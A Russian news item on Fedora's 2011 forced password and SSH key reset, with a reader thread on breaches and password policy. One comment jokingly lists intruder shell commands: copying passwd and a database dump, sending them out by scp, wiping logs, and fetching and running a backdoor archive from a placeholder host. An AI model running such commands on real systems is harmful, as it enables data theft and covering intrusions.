Администраторы инфраструктуры проекта Fedora объявили (http://lists.fedoraproject.org/pipermail/announce/2011-Octob...) о намерении сменить все пароли доступа и SSH-ключи для аккаунтов во всех сервисах проекта. Аккаунты для которых до 30 ноября не будет произведена смена пароля будут заблокированы. Отмечается, что подобный шаг является мерой предосторожности и не связан с компрометацией или обнаружением уязвимости в элементах инфраструктуры.Не скрывается, что опасения связаны с произошедшими за последние месяцы взломами крупных открытых проектов (kernel.org (http://www.opennet.me/opennews/art.shtml?num=31651), linuxfoundation.org, linux.com (http://www.opennet.me/opennews/art.shtml?num=31726), winehq.org (http://www.opennet.me/opennews/art.shtml?num=32013), mysql.com (http://www.opennet.me/opennews/art.shtml?num=31862)), произошедшими вследствие (http://www.opennet.me/opennews/art.shtml?num=31922) утечки параметров аутентификации у их участников. Кроме смены параметров а...
URL: http://lists.fedoraproject.org/pipermail/announce/2011-Octob...
Новость: http://www.opennet.me/opennews/art.shtml?num=32026
Всё верно, учатся на чужих ошибках.
Все никак не пойму они прикидываются или как ?
Любому видно что ЭТО банальный человеческий фактор !
И смена паролей ничего не даст..... ( почти ;) )
На основании чего ты делаешь подобное заявление? Ты - Брюс Шнайер?В СОни тоже был человеческий фактор?
Брюс Шнайер таких глупостей не говорит. Не надо клепать на уважаемого человека. :)
> На основании чего ты делаешь подобное заявление?На основании банальной статистики. Больше человек — больше вероятность ошибки. В свободных проектах куча разработчиков причём они сидят не в одном офисе и контролировать что они делают ещё на своём компьютере и что запускают — невозможно.
вместо того, чтоб искустно раставить сеть для злаумышлеников, они решили отбежать подальше...
Они -- кодеры, а не Супергерои.
> Они -- кодеры, а не Супергерои.Они - кодеры, а по НОРМАЛЬНЫМ методикам разработки в команде КОДЕРОВ должен быть АДМИНИСТРАТОР БЕЗОПАСНОСТИ. Это очевидно всем, только не кодерам.
>должен быть АДМИНИСТРАТОР БЕЗОПАСНОСТИОни надеются на лучшее :)
>>должен быть АДМИНИСТРАТОР БЕЗОПАСНОСТИ
> Они надеются на лучшее :)Лучшее произошло с кернелюорг.
Перечисли поименно кого ты считаешь за кодеров, и как ты выяснил про каждого из них что он не "АДМИНИСТРАТОР БЕЗОПАСНОСТИ".
Пошел ты. Назови лучше поименно ТЫ состав проектной команды - хотя бы одной - и ткни среди них пальцем в АДМИНИСТРАТОРА БЕЗОПАСНОСТИ.
ты их обвиняешь, тебе и называть
opennet становится похож на habr: стот кому-то высказать конструктивную критику, его сходу минусуют. Конечно, столько пафоса и большими буквами не надо, но один толковый админ просто необходим, это факт. Я живу в глухой российской деревне и здесь обычная картина, когда молодой стартап вырастает и программер понимают, что им нужен отдельный админ. В глазах уже сливаются эти маленькие конторки, с одними и теми же детскими проблемами: один большой сервер с кучей сервисов, 10 юзеров и все судоеры, неправильно спланирована сеть, нужен policy routing и проч.
То, что выше к Fedora не относится. После того, как их взломали в 2000-каком-то они ввели двухфакторную аутентификацию.http://www.yubico.com/fedora-uses-yubikey-for-strong-two-fac...-
Всех не переловишь. Да и у них там этим АНБ/ФБР занимается.
да ловить-то кого? Честных людей взломали :). Интереснее было бы проследить, что именно делают эти "взломщики" на сервере...
Но для этого 1-3 админов маловато будет :(
> да ловить-то кого? Честных людей взломали :).
> Интереснее было бы проследить, что именно делают эти "взломщики" на сервере...# mkdir -p /usr/share/man/manX/
# cp -a /etc/passwd /usr/share/man/manX/passwd.X
# cp -a /etc/passwd /usr/share/man/manX/shadow.X
# mysqldump > /usr/share/man/manX/mysql.X
# tar -cf /tmp/-X0.tmp /usr/share/man/manX/
# scp /tmp/-X0.tmp admin@root.org:
# rm -rf /tmp/-X0.tmp /usr/share/man/manX/*;
# mysql
INSERT INTO secret.user ...
# find /var/log -type f -exec echo " " > {} \;# cd /tmp; wget http://super-puper.f00cking.trojan.org/backdoors.tgz
# tar -xvf backdoors.tgz; cd backdoors; make all; ./run.sh;ну и так далее.
>[оверквотинг удален]
> # mysqldump > /usr/share/man/manX/mysql.X
> # tar -cf /tmp/-X0.tmp /usr/share/man/manX/
> # scp /tmp/-X0.tmp admin@root.org:
> # rm -rf /tmp/-X0.tmp /usr/share/man/manX/*;
> # mysql
> INSERT INTO secret.user ...
> # find /var/log -type f -exec echo " " > {} \;
> # cd /tmp; wget http://super-puper.f00cking.trojan.org/backdoors.tgz
> # tar -xvf backdoors.tgz; cd backdoors; make all; ./run.sh;
> ну и так далее.Это здорово. Но вопрос: как получить root на kernel.org (там ведь обновления проходят регулярно)?
Интересно, расскажут ли об этом когда-нибудь...
> Это здорово. Но вопрос: как получить root на kernel.org (там ведь обновления
> проходят регулярно)?На сайте — да, регулярно свежие ядра выкладывают (:
А вот на серверах какой-то старенький дистр, проскакивала где-то такая инфа.
они работают над проэктом Федора а не над расставлением сетей для злоумышленников которых там вероятно нет.
Почему Вы думаете, что они её не расставили?
> от 20 букв в нижнем регистре.Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)
И где тут смесь регистров и знаки препинания? Хотя конечно если всю фразу вводить - сойдет :)). Но столько печатать будет утомительно.
Такие длинные пароли не только тяжело подобрать их еще и лень вводить.
Когда люди привыкают часто вводить пароль, они начинают их вводить бездумно на любой запрос. С действительно длинным паролем срабатывает рефлекс: "А может не надо?", и бывает, что действительно не надо...Это как противоположность системы безопасности в Win, где на изменения появляются предупреждения. Но эти предупреждения появляются так часто, а нажать кнопочку "Ага" так просто, что пользователи начинают их тыкать автоматически (ну кроме редких педантов).
Длинные и сложные пароли - всегда хорошая практика.
Ну на кой ты это все тут нагенерил?!
---Шутка юмора была про пароли из 20 нижнерегистровых букав и
про какое первое слово, в котором около 20 букав, придёт в мозг.
Моя утверждает что многим придёт в голову слово internationalization.
Да, помню на хабре недавно публиковали хороший алгоритм подбора паролей. В легкую брутились пароли вроде васяйцукен123 и даже куда более сложные на первый взгляд (до 4х простых составных частей) так что длина пароля сама по себе мало уже что значит
Несусветная глупость. Хаксоры локалхоста взламывают пароли проникая взглядом под черепную коробку пользователя, без применения технических средств.Те, кто использует пароли "777" и "пароль" умрут, но продолжат их использовать. Для остальных
>длина пароля сама по себе мало уже что значиткак раз длина пароля много чего значит.
> Несусветная глупость. Хаксоры локалхоста взламывают пароли проникая взглядом под черепную
> коробку пользователя, без применения технических средств.
> Те, кто использует пароли "777" и "пароль" умрут, но продолжат их использовать.
> Для остальных
>>длина пароля сама по себе мало уже что значит
> как раз длина пароля много чего значит.Не трать порох. Этот недоумок никогда не слышал ни о пространсте перебора, ни о атаке по словарям.
> как раз длина пароля много чего значит.Если пароль составлен как комбинация нескольких более-менее общеизвестных слов/цифр, он выглядит секурно (с длиной - порядок), но на самом деле - брутфорсится довольно быстро. Потому что слов придуманных человечеством сильно меньше чем 256^20 например (число вариантов в идеале для 20-символьного пароля). Перебрать комбинации 2-3 слов и даже с наиболее типовыми мутациями - вполне реальная задача, особенно если хещи паролей крякать.
Поэтому сам факт что у тебя 20-символьный пароль еще вовсе не гарантирует что его завтра не сломает какой-то Пупкин. Чтобы Пупкин его натурально не сломал, он еще и должен быть более-менее честным рандомом. Запоминать 20 более-менее рандомных символов может задолбаться и сам обладатель пароля...
Комбинации из 2-3 слов хорошо разбавляются разными символами и циферками, а ещё слова можно не писать полностью. Всё это довольно сильно разбавляет общеупотребимый набор слов.
Другое дело, что всех этих паролей и прочей подобной информации появляется много и всего запомнить невозможно. А раз так, то значит есть списки, а к спискам мастер пароль. Наличие мастер пароля я считаю это плохой идеей в принципе, тут нужен другой подход.
>> от 20 букв в нижнем регистре.
> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)Пример паролей от 20 букв подбирающихся за 20 минут?
>>> от 20 букв в нижнем регистре.
>> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)
> Пример паролей от 20 букв подбирающихся за 20 минут?Кто ж тебе даст подбирать 20 минут.
Три неверных - минуту куришь, ещё три - ещё три куришь, потом ещё три - уже полчаса отдыхай.
>>>> от 20 букв в нижнем регистре.
>>> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)
>> Пример паролей от 20 букв подбирающихся за 20 минут?
> Кто ж тебе даст подбирать 20 минут.
> Три неверных - минуту куришь, ещё три - ещё три куришь, потом
> ещё три - уже полчаса отдыхай.Да, да, а потом вообще пошлет на страницу капчу расшифровывать и на глупые вопросы отвечать...
Я имел ввиду подбор по хэшу. Его продолжительность должна быть дольше, чем время за которое станет известно, что хеш увели. А еще паронаидальнее исходить из предположения, что хеш всегда общедоступен и время подбора должно быть больше времени жизни пароля. :-)К чему я это написал? Может быть к тому, что "интернационализация" - далеко не первое, что пришло мне в голову... ;-)
>> от 20 букв в нижнем регистре.
> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)я знаю еще лучше: echo parol | sha512sum
>>> от 20 букв в нижнем регистре.
>> Я уже знаю 2 пароля - internationalizationab, internationalizationabc :)
> я знаю еще лучше: echo parol | sha512sumЗря так думаешь. Зная алгоритм хэширования - если без соли - легко провести словарную атаку, при таком говенном пароле.
Rindfleischetikettierungsüberwachungsaufgabenübertragungsgesetz
В сурьезных конторах пароли положено раз в месяц менять для профилактики.
И при любом подозрении на взлом или утечку.
Все правильно сделали.
А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых работают сервисы и пр.
> А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых
> работают сервисы и пр.А это кодеры сервисов должны предусматривать. Теоретически. Потому что в нормальных системах сервисные аккаунты заблокированы или заэкспайрены.
> А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых
> работают сервисы и пр.В таких конторах не держат винду, поэтому учётка выглядит так:
freeradius:*:133:133::0:0:FreeRADIUS Daemon:/nonexistent:/usr/sbin/nologin
> А вот интересно, как в таких конторах меняют пароли аккаунтов, от которых
> работают сервисы и пр.Зачем на системные аккаунты ставить пароли?
> В сурьезных конторах пароли положено раз в месяц менять для профилактики.И сотрудники хранят эти пароли прикрепленными бумажками к монитору или ставят примитивные пароли типа 123a, 123b...123z, потому что не реально каждый месяц запоминать новый пароль. Типичный пример заблуждений в политике безопасности.
Однажды Сисадмин пожаловался Учителю:
– Мы выдали всем нашим пользователям индивидуальные пароли, а они не желают хранить их в тайне. Записывают на листочках и приклеивают к мониторам. Что нам делать? Как заставить их?
Инь Фу Во спросил:
– Сначала скажи, почему они это делают.
Сисадмин подумал и ответил:
– Может быть, они не считают пароль ценным?
– А разве пароль сам по себе ценный?
– Не сам по себе. Ценна информация, которая под паролем.
– Для кого она ценна?
– Для нашего предприятия.
– А для пользователей?
– Для пользователей, видимо, нет.
– Так и есть, – сказал Учитель. – Под паролем нет ничего ценного для наших работников. Надо, чтоб было.
– Что для них ценно? – спросил Сисадмин.
– Догадайся с трёх раз, – рассмеялся Учитель.
Сисадмин ушёл просветлённый и сделал на корпоративном портале персональные странички для всех работников. И на тех страничках был указан размер зарплаты. Узнав об этом, все пользователи забеспокоились о своих паролях. На другой день в курилке обсуждали размер зарплаты Главбуха. На третий день ни у кого не было видно листочков с паролями.
Притча зантяная, но тогда просто включится второй вариант - смена пароля по какому-то примитивному алгоритму. Потому что каждый месяц новый запоминать таки никто не будет.
еще как будет! Все зависит от подачи пароля...
например если в случае с притчей доделать сайт так, что сумма зрплаты каждую минуту падает на 1дол. а восстановить базовую сумму можно зайдя на страничку. А в момент выдачи ЗП бух смотрит на сумму на страничке и выдает ту сумму какая есть на страничке.
Для особо рьяных по хождению на страничку - премия 5 дол.
После этого будут каждые 2 дня новый пароль из 20 символов(не букв) выучивать за нефиг делать...
> После этого будут каждые 2 дня новый пароль из 20 символов(не букв) выучивать за нефиг делать...Сомневаюсь. Я бы с такой работы уволился — моя голова не ящик для паролей.
> Однажды Сисадмин пожаловался Учителю:
> – Мы выдали всем нашим пользователям индивидуальные пароли, а они не желают
> хранить их в тайне. Записывают на листочках и приклеивают к мониторам.
> Что нам делать? Как заставить их?
> Инь Фу Во спросил:
> – Сначала скажи, почему они это делают.Потому, что у них есть бумажки.
>> Однажды Сисадмин пожаловался Учителю:
>> – Мы выдали всем нашим пользователям индивидуальные пароли, а они не желают
>> хранить их в тайне. Записывают на листочках и приклеивают к мониторам.
>> Что нам делать? Как заставить их?
>> Инь Фу Во спросил:
>> – Сначала скажи, почему они это делают.
> Потому, что у них есть бумажки.Потому что у них нет межушного ганглия.
> – Сначала скажи, почему они это делают.
>Потому, что у них есть бумажки.Потому, что пароль он в основном от внешнего вторжения, а не от соседа слева
>> – Сначала скажи, почему они это делают.
>>Потому, что у них есть бумажки.
> Потому, что пароль он в основном от внешнего вторжения, а не от
> соседа слеваПри этом 99% всех краж данных, паролей, вторжений исходит от внутренних сотрудников.
ТРИЗ в действии :-)
Похоже, автор этого анекдота -- ученик Альтшулера.
Подтвеждаю! Работаю на Сименсе - пароли меняются регулярно, и простой пароль типа 123456 не введёшь, и запоминает последние 5 или 7 паролей - приходится импровизировать.
О,о - не знал, что в таких крупных проектах, как Fedora, не сделана принудительная, регулярная смена пароля :-(
> Подтвеждаю! Работаю на Сименсе - пароли меняются регулярно, и простой пароль типа
> 123456 не введёшь, и запоминает последние 5 или 7 паролей - приходится импровизировать.Что в крупных компаниях маразм крепок известно хорошо. Это потому что манагеров там много.
Интерестно, а ты знаешь что такое ТРИЗ? Наверное ты динозавр как и я.
Сдается мне что у них был взлом - и они пытаются прикрыться чужими что бы не марать свое имя.
>Сдается мне что у них был взлом - и они пытаются прикрыться чужими что бы не марать свое имя.Сдается мне, это все мировой заговор. А во главе - Столман и Торвальдс. Они хотят захватить мир и убить всех человеков, не иначе.
да? просто у fedora был уже взлом инфраструктуры... если официально объявить о еще одном - это расписаться в своем невежестве. А так - очень даже..
"Безопасность — это процесс, а не результат" (C)
Ядро надо менять, ядро! А не пароли.Если ядро позволяет повысить привилегии простого пользователя до рута, а разработчики ядра вместо исправления ошибки запрещают ssh-доступ, то менять надо ядро.
предложи альтернативу